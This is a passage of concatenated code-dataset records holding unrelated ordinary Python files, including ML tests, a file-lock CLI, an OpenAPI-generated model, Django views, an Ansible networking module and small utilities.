sklearn.datasets import make_classification\nfrom sklearn.linear_model import SGDClassifier\n\nfrom common import SplearnTestCase\nfrom splearn.rdd import ArrayRDD, DictRDD\nfrom splearn.linear_model import SparkSGDClassifier\n\n\nclass LinearModelStochasticGradientTestCase(SplearnTestCase):\n\n def setUp(self):\n super(LinearModelStochasticGradientTestCase, self).setUp()\n self.outputdir = tempfile.mkdtemp()\n\n def tearDown(self):\n super(LinearModelStochasticGradientTestCase, self).tearDown()\n shutil.rmtree(self.outputdir)\n\n def generate_dataset(self, n_classes, n_samples, blocks=None):\n X, y = make_classification(n_classes=n_classes,\n n_samples=n_samples, n_features=10,\n n_informative=4, n_redundant=0,\n n_clusters_per_class=1,\n random_state=42)\n\n X_rdd = self.sc.parallelize(X, 4)\n y_rdd = self.sc.parallelize(y, 4)\n Z_rdd = X_rdd.zip(y_rdd)\n\n Z = DictRDD(Z_rdd, columns=('X', 'y'), block_size=blocks)\n\n return X, y, Z\n\n\nclass TestSGDClassifier(LinearModelStochasticGradientTestCase):\n\n def test_same_prediction(self):\n X, y, Z = self.generate_dataset(2, 80000)\n\n local = SGDClassifier(average=True)\n dist = SparkSGDClassifier(average=True)\n\n local.fit(X, y)\n dist.fit(Z, classes=np.unique(y))\n\n y_local = local.predict(X)\n y_dist = np.concatenate(dist.predict(Z[:, 'X']).collect())\n\n mismatch = y_local.shape[0] - np.count_nonzero(y_dist == y_local)\n mismatch_percent = float(mismatch) * 100 / y_local.shape[0]\n\n assert_true(mismatch_percent <= 1)\n","sub_path":"python/test/test_linear_model_stochastic_gradient.py","file_name":"test_linear_model_stochastic_gradient.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266548361","text":"from filelock import Timeout, 
FileLock\nfrom colorama import Fore\nimport argparse\n\n\ndef main():\n print(Fore.GREEN + 'GIT LOCKER\\n' + Fore.LIGHTGREEN_EX + 'Run -h to get started' + Fore.RESET)\n\n parser = argparse.ArgumentParser('Commands for git-locker')\n parser.add_argument('-l', help='locks a file')\n parser.add_argument('-t', help='Time limit for the file to be locked')\n parser.add_argument('-pg', help='Prevent git from committing the file [F|T]')\n args = parser.parse_args()\n\n if not args.l or not args.t:\n print(Fore.RED + '[X] Invalid usage!')\n print(Fore.RED + '[+] ' + parser.usage + Fore.RESET)\n else:\n file_path = args.l\n lock_path = file_path + '.lock'\n timeout = args.t\n lock = FileLock(lock_file=lock_path)\n print(\n Fore.GREEN + '[+]' + Fore.LIGHTCYAN_EX + ' locked file ' + Fore.MAGENTA + lock_path + Fore.LIGHTCYAN_EX\n + ' for ' + Fore.MAGENTA + str(timeout))\n try:\n with lock.acquire(timeout=timeout):\n if not lock.is_locked and timeout == 0:\n print(Fore.BLUE + '[*] Releasing lock!')\n lock.release()\n except Timeout:\n print(Fore.RED + '[X] Another instance is currently holding a lock!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"locker.py","file_name":"locker.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389850490","text":"# coding: utf-8\n\n\"\"\"\n Onshape REST API\n\n The Onshape REST API consumed by all clients. # noqa: E501\n\n The version of the OpenAPI document: 1.113\n Contact: api-support@onshape.zendesk.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import absolute_import\nimport re # noqa: F401\nimport sys # noqa: F401\n\nimport six # noqa: F401\nimport nulltype # noqa: F401\n\nfrom onshape_client.oas.model_utils import ( # noqa: F401\n ModelComposed,\n ModelNormal,\n ModelSimple,\n date,\n datetime,\n file_type,\n int,\n none_type,\n str,\n validate_get_composed_info,\n)\n\ntry:\n from onshape_client.oas.models import three_d_secure\nexcept ImportError:\n three_d_secure = sys.modules[\"onshape_client.oas.models.three_d_secure\"]\n\n\nclass Card(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). 
The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n additional_properties_type = None\n\n @staticmethod\n def openapi_types():\n \"\"\"\n This must be a class method so a model may have properties that are\n of type self, this ensures that we don't create a cyclic import\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n \"account\": (str,), # noqa: E501\n \"address_city\": (str,), # noqa: E501\n \"address_country\": (str,), # noqa: E501\n \"address_line1\": (str,), # noqa: E501\n \"address_line1_check\": (str,), # noqa: E501\n \"address_line2\": (str,), # noqa: E501\n \"address_state\": (str,), # noqa: E501\n \"address_zip\": (str,), # noqa: E501\n \"address_zip_check\": (str,), # noqa: E501\n \"available_payout_methods\": ([str],), # noqa: E501\n \"brand\": (str,), # noqa: E501\n \"country\": (str,), # noqa: E501\n \"currency\": (str,), # noqa: E501\n \"customer\": (str,), # noqa: E501\n \"cvc_check\": (str,), # noqa: E501\n \"default_for_currency\": (bool,), # noqa: E501\n \"description\": (str,), # noqa: E501\n \"dynamic_last4\": (str,), # noqa: E501\n \"exp_month\": (int,), # noqa: E501\n \"exp_year\": (int,), # noqa: E501\n \"fingerprint\": (str,), # noqa: E501\n \"funding\": (str,), # noqa: E501\n \"id\": (str,), # noqa: E501\n \"iin\": (str,), # noqa: E501\n \"instance_url\": (str,), # noqa: E501\n \"issuer\": (str,), # noqa: E501\n \"last4\": (str,), # noqa: E501\n \"metadata\": ({str: (str,)},), # noqa: E501\n \"name\": (str,), # noqa: E501\n \"object\": (str,), # noqa: E501\n \"recipient\": (str,), # noqa: E501\n \"status\": (str,), # noqa: E501\n \"three_d_secure\": (three_d_secure.ThreeDSecure,), # noqa: E501\n \"tokenization_method\": (str,), # noqa: E501\n \"type\": (str,), # noqa: E501\n }\n\n @staticmethod\n def discriminator():\n return None\n\n attribute_map = {\n \"account\": \"account\", # noqa: E501\n \"address_city\": \"addressCity\", # noqa: E501\n \"address_country\": \"addressCountry\", # noqa: E501\n \"address_line1\": \"addressLine1\", # noqa: E501\n \"address_line1_check\": \"addressLine1Check\", # noqa: E501\n \"address_line2\": \"addressLine2\", # noqa: E501\n \"address_state\": \"addressState\", # noqa: E501\n \"address_zip\": \"addressZip\", # noqa: E501\n \"address_zip_check\": \"addressZipCheck\", # noqa: E501\n \"available_payout_methods\": \"availablePayoutMethods\", # noqa: E501\n \"brand\": \"brand\", # noqa: E501\n \"country\": \"country\", # noqa: E501\n \"currency\": \"currency\", # noqa: E501\n \"customer\": \"customer\", # noqa: E501\n \"cvc_check\": \"cvcCheck\", # noqa: E501\n \"default_for_currency\": \"defaultForCurrency\", # noqa: E501\n \"description\": \"description\", # noqa: E501\n \"dynamic_last4\": \"dynamicLast4\", # noqa: E501\n \"exp_month\": \"expMonth\", # noqa: E501\n \"exp_year\": \"expYear\", # noqa: E501\n \"fingerprint\": \"fingerprint\", # noqa: E501\n \"funding\": \"funding\", # noqa: E501\n \"id\": \"id\", # noqa: E501\n \"iin\": \"iin\", # noqa: E501\n \"instance_url\": \"instanceURL\", # noqa: E501\n \"issuer\": \"issuer\", # noqa: E501\n \"last4\": \"last4\", # noqa: E501\n \"metadata\": \"metadata\", # noqa: E501\n \"name\": \"name\", # noqa: E501\n \"object\": 
\"object\", # noqa: E501\n \"recipient\": \"recipient\", # noqa: E501\n \"status\": \"status\", # noqa: E501\n \"three_d_secure\": \"threeDSecure\", # noqa: E501\n \"tokenization_method\": \"tokenizationMethod\", # noqa: E501\n \"type\": \"type\", # noqa: E501\n }\n\n @staticmethod\n def _composed_schemas():\n return None\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_from_server\",\n \"_path_to_item\",\n \"_configuration\",\n ]\n )\n\n def __init__(\n self,\n _check_type=True,\n _from_server=False,\n _path_to_item=(),\n _configuration=None,\n **kwargs\n ): # noqa: E501\n \"\"\"card.Card - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _from_server (bool): True if the data is from the server\n False if the data is from the client (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n account (str): [optional] # noqa: E501\n address_city (str): [optional] # noqa: E501\n address_country (str): [optional] # noqa: E501\n address_line1 (str): [optional] # noqa: E501\n address_line1_check (str): [optional] # noqa: E501\n address_line2 (str): [optional] # noqa: E501\n address_state (str): [optional] # noqa: E501\n address_zip (str): [optional] # noqa: E501\n address_zip_check (str): [optional] # noqa: E501\n available_payout_methods ([str]): [optional] # noqa: E501\n brand (str): [optional] # noqa: E501\n country (str): [optional] # noqa: E501\n currency (str): [optional] # noqa: E501\n customer (str): [optional] # noqa: E501\n cvc_check (str): [optional] # noqa: E501\n default_for_currency (bool): [optional] # noqa: E501\n description (str): [optional] # noqa: E501\n dynamic_last4 (str): [optional] # noqa: E501\n exp_month (int): [optional] # noqa: E501\n exp_year (int): [optional] # noqa: E501\n fingerprint (str): [optional] # noqa: E501\n funding (str): [optional] # noqa: E501\n id (str): [optional] # noqa: E501\n iin (str): [optional] # noqa: E501\n instance_url (str): [optional] # noqa: E501\n issuer (str): [optional] # noqa: E501\n last4 (str): [optional] # noqa: E501\n metadata ({str: (str,)}): [optional] # noqa: E501\n name (str): [optional] # noqa: E501\n object (str): [optional] # noqa: E501\n recipient (str): [optional] # noqa: E501\n status (str): [optional] # noqa: E501\n three_d_secure (three_d_secure.ThreeDSecure): [optional] # noqa: E501\n tokenization_method (str): [optional] # noqa: E501\n type (str): [optional] # noqa: E501\n \"\"\"\n\n self._data_store = {}\n self._check_type = _check_type\n self._from_server = _from_server\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n\n for var_name, var_value in six.iteritems(kwargs):\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, 
var_value)\n","sub_path":"python/onshape_client/oas/models/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":9994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405846960","text":"#!/usr/bin/python\n\nimport logging\nimport sys\n\nlog = logging.getLogger('root')\nlog.setLevel(logging.DEBUG)\n\nstream = logging.StreamHandler(sys.stdout)\nstream.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('[%(asctime)s] %(levelname)8s %(module)15s: %(message)s')\nstream.setFormatter(formatter)\n\nlog.addHandler(stream)\n\n\nimport time\nimport datetime\nimport threading\nimport Clock\nimport Alarm\n\n\nclass AlarmPi:\n def __init__(self):\n self.stopping = False\n\n def stop(self):\n self.stopping = True\n\n def execute(self):\n log.info(\"Preparing something\")\n log.debug(\"Loading Alarm\")\n alarm = Alarm.Alarm()\n alarm.setDaemon(True)\n\n log.debug(\"Loading Clock\")\n clock = Clock.Clock()\n clock.setDaemon(True)\n clock.start()\n alarm.start()\n\n\n # Main loop till KeyboardInterrupt.\n try:\n while(self.stopping is False):\n time.sleep(1)\n except (KeyboardInterrupt, SystemExit):\n log.warn(\"Interrupted!, shutting down\")\n\n log.warn(\"Shutting down\")\n # +Shutdown sound\n time.sleep(2)\n\n log.info(\"Stopping all services\")\n clock.stop()\n alarm.stop()\n\n log.info(\"Shutdown complete, now exiting\")\n\n time.sleep(2) # To give threads time to shut down\n\nalarm = AlarmPi()\nalarm.execute()\n# Start up the AlarmPi class.","sub_path":"alarmpi.py","file_name":"alarmpi.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541002197","text":"\nfrom sys import exit\nfrom os import path\nfrom json import loads, dumps\nfrom time import time\nfrom datetime import datetime\n\ndef readin(filename):\n '''reads json'''\n try:\n ffapi = str()\n if path.exists(filename):\n ffapi = filename\n elif path.exists(path.join(path.abspath(path.dirname(__file__)), filename)):\n ffapi = path.join(path.abspath(path.dirname(__file__)), filename)\n else:\n raise Exception('json file not found')\n\n with open(ffapi, 'r') as fn:\n return loads(fn.read())\n\n except Exception as ex:\n exit(ex)\n\ndef writeout(filename, content):\n '''writes json'''\n try:\n with open(filename, 'w') as fn:\n return fn.write(dumps(content, indent=4))\n except Exception as ex:\n exit(ex)\n\ndef tstamp(short=False):\n '''get timestamp'''\n if short:\n return int(time())\n return datetime.now().isoformat('T')\n\nclass Loader(object):\n '''replace existing fields'''\n def __init__(self, filename):\n super(Loader, self).__init__()\n self.filename = filename\n self.ffapi = readin(self.filename)\n\n def dump(self, overwrite=False):\n '''writes ffapi'''\n if self.ffapi:\n filename = self.filename if overwrite else self.filename.replace('.json', '_change.json')\n self.set(['state', 'lastchange'], tstamp(short=False))\n return writeout(filename, self.ffapi)\n\n def get(self):\n '''get ffapi'''\n return self.ffapi\n\n def find(self, fields):\n '''finds fields'''\n scope = self.ffapi\n for field in fields:\n if field in scope.keys():\n if field == fields[-1]:\n return scope[field]\n scope = scope[field]\n\n def set(self, fields, value):\n '''sets fields'''\n scope = self.ffapi\n for field in fields:\n if field in scope.keys():\n if field == fields[-1]:\n scope[field] = value\n scope = scope[field] # Pointerfun with Blinky!\n\nif __name__ == '__main__':\n loader = 
Loader('ffapi_file.json')\n\n print('name => %s\\n' %(loader.find(['name'])))\n print('location,city => %s\\n' %(loader.find(['location', 'city'])))\n\n loader.set(['api'], '1.2.3')\n\n loader.dump(overwrite=False)\n\n","sub_path":"changeffapi.py","file_name":"changeffapi.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"447070940","text":"import seaborn as sns\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\n\n\nrcParams.update({'figure.autolayout': True})\n\n# forget_colors = ['darkorchid', 'mediumspringgreen', 'midnightblue']\n\ndef make_layered_lineplot(arraylist, condlist, target, colorlist, phase):\n fig, ax = plt.subplots()\n for array, color, cond in zip(arraylist, colorlist, condlist):\n line=sns.lineplot(data = array, x=array.index, y=target, ax=ax,\n label=cond, color=color)\n ax.legend()\n ax.set_xlabel('Time (ms)')\n ax.set_ylabel('Proportion of Viewing')\n line=line.get_figure()\n line.savefig('figs/line' + target + phase + '.png')\n plt.clf()\n","sub_path":"domcue/make_domcue_figs.py","file_name":"make_domcue_figs.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324916163","text":"import unittest\nimport xlrd\nfrom ddt import ddt\nfrom ddt import data\nfrom ddt import unpack\nfrom Calc import Calc\n\ndef getvalue(file,sheetnub):\n\n rd = xlrd.open_workbook(filename=file,encoding_override=True)\n sheet = rd.sheet_by_index(sheetnub)\n\n rows = sheet.nrows\n cols = sheet.ncols\n\n f = []\n for i in range(rows):\n f.append(sheet.row_values(i))\n\n return f\n\n\n\nf1 = getvalue(\"测试数据.xls\",0)\nf2 = getvalue(\"测试数据.xls\",1)\nf3 = getvalue(\"测试数据.xls\",2)\nf4 = getvalue(\"测试数据.xls\",3)\n\n@ddt\nclass TestExcle(unittest.TestCase):\n\n @data(*f1)\n @unpack\n def test_Add(self,a,b,c):\n calc = Calc()\n sum = calc.add(a,b)\n self.assertEqual(c,sum)\n\n @data(*f2)\n @unpack\n def test_Reduce(self,a,b,c):\n calc = Calc()\n sum = calc.reduce(a,b)\n self.assertEqual(c, sum)\n\n @data(*f3)\n @unpack\n def test_Multi(self,a,b,c):\n calc = Calc()\n sum = calc.multi(a,b)\n self.assertEqual(c, sum)\n\n @data(*f4)\n @unpack\n def test_Division(self,a,b,c):\n calc = Calc()\n sum = calc.division(a,b)\n self.assertEqual(c, sum)\n","sub_path":"day17/TestCalc.py","file_name":"TestCalc.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"24530990","text":"from rest_framework.permissions import (\n SAFE_METHODS,\n AllowAny,\n BasePermission,\n IsAdminUser,\n)\n\n\nclass PermissionMixin:\n def get_permissions(self):\n permission_classes = []\n\n if self.action in (\"list\", \"retrieve\"):\n permission_classes = [AllowAny]\n\n if self.action in (\"create\", \"destroy\", \"update\", \"partial_update\"):\n permission_classes = [IsAdminUser]\n\n return [permission() for permission in permission_classes]\n\n\nclass IsAuthorOrStaff(BasePermission):\n \"\"\"\n Доступ для автора, модератора или администратора.\n \"\"\"\n\n def has_object_permission(self, request, view, obj):\n\n return (\n request.method in SAFE_METHODS\n or request.user.role in [\"admin\", \"moderator\"]\n or obj.author == request.user\n 
)\n","sub_path":"api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91925711","text":"'''\n题目:有n个整数,使其前面各数顺序向后移m个位置,\n 最后m个数变成最前面的m个数\n'''\na = [i for i in range(1,20,2)]\ndef move_item(n):\n for j in range(n):\n temp = a.pop()\n a.insert(0,temp)\n print(a)\n\nif __name__ == '__main__':\n print(\"The original list is:\\n\",a)\n num = int(input(\"Num(1-9):\"))\n move_item(num)\n","sub_path":"python100例/37_列表项移动.py","file_name":"37_列表项移动.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462094784","text":"import argparse\r\nimport time\r\nimport os\r\nfrom dao import save, load\r\nfrom writer import random_text, flatten\r\nfrom reader import process_file\r\n\r\ndef main(run_test=False, new_data=False, n=500):\r\n\tsuffix_maps = ''\r\n\tif new_data:\r\n\t\tprint(\"Refreshing Data.\")\r\n\t\tfor db in ['narration.dat', 'narration.dir', 'narration.bak', 'dialog.dat', 'dialog.dir', 'dialog.bak']:\r\n\t\t\tif os.path.exists(db):\r\n\t\t\t\tos.remove(db)\r\n\t\tfor filename, encoding in ({'alp.txt': None, 'tsg.txt':'utf8', 'llf.txt':'utf8', 'hhc.txt':'utf8'}.items()):\r\n\t\t\tsuffix_maps = process_file(filename, encoding)\r\n\t\tif not run_test:\r\n\t\t\tsave(suffix_maps)\r\n\r\n\ttime_0 = time.time()\r\n\tprint(\"Loading data...\")\r\n\tif not run_test:\r\n\t\tsuffix_maps = load()\r\n\ttime_1 = time.time()\r\n\tprint(\"Data loaded! Time:\" + str(time_1 - time_0))\r\n\tnarration = random_text(suffix_maps[0], n)\r\n\ttime_2 = time.time()\r\n\tprint(\"Narration created! Time:\" + str(time_2 - time_1))\r\n\tdialog = random_text(suffix_maps[1], n)\r\n\ttime_3 = time.time()\r\n\tprint(\"Dialog created! Time:\" + str(time_3 - time_2))\r\n\ttext = flatten(narration, dialog, n)\r\n\ttime_4 = time.time()\r\n\tprint(\"Text flattened! 
Time:\" + str(time_4 - time_3))\r\n\tprint(\"##################################################################\")\r\n\tprint(text)\r\n\r\n# python .\\main.py --new_data\r\nif __name__ == '__main__':\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\"-R\", \"--run_test\", help=\"test mode\", action=\"store_true\")\r\n\tparser.add_argument(\"-D\", \"--new_data\", help=\"replace databases from files\", action=\"store_true\")\r\n\tparser.add_argument(\"-n\", \"--num_chars\", type=int, help=\"num of characters to write\")\r\n\targs = parser.parse_args()\r\n\tkwargs={'run_test': args.run_test, 'new_data': args.new_data}\r\n\tif args.num_chars:\r\n\t\tkwargs['n'] = args.num_chars\r\n\tmain(**kwargs)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"451008586","text":"from Graph import dag\n\n\ndef dag_sssp(g):\n g.restore(1)\n rst = g.topological_sort()\n for i in rst:\n for j in range(len(g.edge)):\n if g.edge[i][j] is not None:\n g.relax(i, j)\n return g.d\n\n\nif __name__ == '__main__':\n print(dag_sssp(dag))\n","sub_path":"algorithm/24/a24.2.py","file_name":"a24.2.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292513753","text":"from page.page_in import PageIn\nfrom tools.get_driver import GetDriver\nfrom tools.get_log import GetLog\nfrom tools.read_yaml import readyaml\n\nlog = GetLog.get_logger()\nrd =readyaml(\"mp_login.yaml\")[0]\n\nclass TestAppLogin():\n def setup_class(self):\n # 初始化\n driver = GetDriver.get_app_driver()\n # 获取统一入口类\n self.pagein = PageIn(driver)\n # 获取PageAppLogin对象\n self.app_login = self.pagein.page_get_PageAppLogin()\n # 结束\n\n def teardown_class(self):\n GetDriver.quit_app_driver()\n # 测试方法\n\n def test_app_login(self, username=rd[0], pwd=rd[1]):\n self.app_login.page_app_login(username, pwd)\n\n # 断言\n try:\n assert self.app_login.page_get_nickname()\n\n except Exception as e:\n # 截图\n self.app_login.base_get_screenshot()\n # 日志\n log.error(e)\n # 抛异常\n raise\n","sub_path":"scripts/test05_app_login.py","file_name":"test05_app_login.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"363268499","text":"#!/usr/bin/python\n\"\"\" PN CLI vrouter-packet-relay-add/remove \"\"\"\n\n# Copyright 2018 Pluribus Networks\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport shlex\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.pn_nvos import pn_cli\n\nDOCUMENTATION = \"\"\"\n---\nmodule: pn_vrouter_packet_relay\nauthor: \"Pluribus Networks (devops@pluribusnetworks.com)\"\nversion: 2\nshort_description: CLI command to add/remove vrouter-packet-relay.\ndescription:\n - C(add): add packet relay configuration for DHCP on vrouter\n - C(remove): remove packet relay configuration for DHCP on 
vrouter\noptions:\n pn_cliswitch:\n description:\n - Target switch to run the CLI on.\n required: False\n type: str\n pn_action:\n description:\n - vrouter-packet-relay configuration command.\n required: true\n choices: ['add', 'remove']\n type: str\n pn_forward_ip:\n description:\n - forwarding IP address\n required: false\n type: str\n pn_nic:\n description:\n - NIC\n required: false\n type: str\n pn_forward_proto:\n description:\n - protocol type to forward packets\n required: false\n type: str\n pn_vrouter_name:\n description:\n - name of service config\n required: false\n type: str\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: add vrouter packet relay\n pn_vrouter_packet_relay:\n pn_action: 'add'\n pn_vrouter_name: 'spine-vrouter'\n pn_forward_ip: '172.16.1.1'\n pn_forward_proto: 'dhcp'\n pn_nic: 'eth0'\n\n- name: remove vrouter packet relay\n pn_vrouter_packet_relay:\n pn_action: 'remove'\n pn_vrouter_name: 'spine-vrouter'\n pn_forward_ip: '172.16.1.1'\n pn_forward_proto: 'dhcp'\n pn_nic: 'eth0'\n\"\"\"\n\nRETURN = \"\"\"\ncommand:\n description: the CLI command run on the target node.\nstdout:\n description: set of responses from the vrouter-packet-relay command.\n returned: always\n type: list\nstderr:\n description: set of error responses from the vrouter-packet-relay command.\n returned: on error\n type: list\nchanged:\n description: indicates whether the CLI caused changes on the target.\n returned: always\n type: bool\n\"\"\"\n\n\ndef run_cli(module, cli):\n \"\"\"\n This method executes the cli command on the target node(s) and returns the\n output. The module then exits based on the output.\n :param cli: the complete cli string to be executed on the target node(s).\n :param module: The Ansible module to fetch command\n \"\"\"\n action = module.params['pn_action']\n cli = shlex.split(cli)\n rc, out, err = module.run_command(cli)\n\n # Response in JSON format\n if err:\n module.fail_json(\n command=' '.join(cli),\n stderr=err.strip(),\n msg=\"vrouter-packet-relay %s operation failed\" % action,\n changed=False\n )\n\n if out:\n module.exit_json(\n command=' '.join(cli),\n stdout=out.strip(),\n msg=\"vrouter-packet-relay %s operation completed\" % action,\n changed=True\n )\n\n else:\n module.exit_json(\n command=' '.join(cli),\n msg=\"vrouter-packet-relay %s operation completed\" % action,\n changed=True\n )\n\n\ndef main():\n \"\"\" This section is for arguments parsing \"\"\"\n module = AnsibleModule(\n argument_spec=dict(\n pn_cliswitch=dict(required=False, type='str'),\n pn_action=dict(required=True, type='str',\n choices=['add', 'remove']),\n pn_forward_ip=dict(required=False, type='str'),\n pn_nic=dict(required=False, type='str'),\n pn_forward_proto=dict(required=False, type='str'),\n pn_vrouter_name=dict(required=False, type='str'),\n )\n )\n\n # Accessing the arguments\n action = module.params['pn_action']\n forward_ip = module.params['pn_forward_ip']\n nic = module.params['pn_nic']\n forward_proto = module.params['pn_forward_proto']\n vrouter_name = module.params['pn_vrouter_name']\n\n # Building the CLI command string\n cli = pn_cli(module)\n cli += 'vrouter-packet-relay-' + action\n\n if forward_ip:\n cli += ' forward-ip ' + forward_ip\n if nic:\n cli += ' nic ' + nic\n if forward_proto:\n cli += ' forward-proto ' + forward_proto\n if vrouter_name:\n cli += ' vrouter-name ' + vrouter_name\n \n run_cli(module, cli)\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"ansible/modules/pn_vrouter_packet_relay.py","file_name":"pn_vrouter_packet_relay.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545432696","text":"from django.shortcuts import render\nfrom django.views.generic import View, TemplateView\nfrom django.http import QueryDict\nfrom django.http import HttpResponse\nimport datetime\n\nfrom .models import TblCategory\n\n\nclass CategoriesView(TemplateView):\n http_method_names = ['get', 'post', 'put', 'delete']\n template_name = 'category_app/index.html'\n\n def get(self, request, *args, **kwargs):\n categories = TblCategory.objects.filter(category_name__contains='').order_by('category_name')\n return render(request, self.template_name, {'categories': categories})\n\n def post(self, request, *args, **kwargs): \n new_category = TblCategory(int(request.POST['category_id']), request.POST['category_name'])\n new_category.save()\n return self.get(request, self.template_name)\n\n def delete(self, request, *args, **kwargs):\n params = QueryDict(request.body)\n # import pdb\n # pdb.set_trace()\n category_id = int(params.get('category_id'))\n category_name = params.get('category_name')\n selected_category = TblCategory.objects.get(category_id=category_id)\n selected_category.delete()\n categories = TblCategory.objects.filter(category_name__contains='').order_by('category_name')\n return render(request, self.template_name, {'categories': categories})\n\n def put(self, request, *args, **kwargs):\n params = QueryDict(request.body)\n category_id = params.get('category_id')\n category_name = params.get('category_name')\n selected_category = TblCategory.objects.get(category_id=category_id)\n selected_category.category_name = category_name\n # import pdb\n # pdb.set_trace()\n return self.get(request, self.template_name)\n","sub_path":"webcrud/category_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558399779","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 19 11:47:42 2019\n\n@author: jbuisine\n\"\"\"\n\n# main imports\nimport sys, os, argparse\nimport numpy as np\nimport random\n\n# images processing imports\nfrom PIL import Image\nfrom ipfml.processing.segmentation import divide_in_blocks\n\n# modules imports\nsys.path.insert(0, '') # trick to enable import of main folder module\n\nimport custom_config as cfg\nfrom modules.utils import data as dt\nfrom modules.classes.Transformation import Transformation\n\n# getting configuration information\nzone_folder = cfg.zone_folder\nlearned_folder = cfg.learned_zones_folder\nmin_max_filename = cfg.min_max_filename_extension\n\n# define all scenes values\nscenes_list = cfg.scenes_names\nscenes_indices = cfg.scenes_indices\ndataset_path = cfg.dataset_path\nzones = cfg.zones_indices\nseuil_expe_filename = cfg.seuil_expe_filename\n\nfeatures_choices = cfg.features_choices_labels\noutput_data_folder = cfg.output_datasets\n\ngeneric_output_file_svd = '_random.csv'\n\ndef generate_data_model(_filename, _transformations, _dataset_folder, _selected_zones):\n\n output_train_filename = os.path.join(output_data_folder, _filename, _filename + \".train\")\n output_test_filename = os.path.join(output_data_folder, _filename, _filename + \".test\")\n\n # create path if not exists\n if not os.path.exists(os.path.join(output_data_folder, 
